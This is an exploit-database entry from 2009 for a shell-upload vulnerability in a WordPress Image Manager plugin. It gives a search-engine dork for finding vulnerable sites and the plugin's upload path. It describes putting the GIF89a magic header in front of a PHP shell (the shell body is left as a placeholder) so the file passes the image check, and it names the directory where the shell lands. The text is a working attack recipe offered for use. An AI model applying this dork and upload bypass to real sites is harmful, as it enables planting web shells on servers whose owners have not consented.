WordPress Plugin Image Manager - Arbitrary File Upload

EDB-ID:

10325

CVE:

N/A


Author:

DigitALL

Type:

webapps


Platform:

PHP

Date:

2009-12-05


# Exploit Title: Wordpress Image Manager Plugins Shell Upload Vulnerability

# Version: No Version All WordPress Systems

# Thanks ; Zombie KroNickq and All 1923Turk.biz Members
# Special Thanks ; Cyb3rking

Dork: inurl:"/plugins/ImageManager/manager.php"

/plugins/ImageManager/manager.php

Your Shell Top

GIF89a;
<?
-----
?>

And Upload Your Shell. Your Shell Go To /demo_images/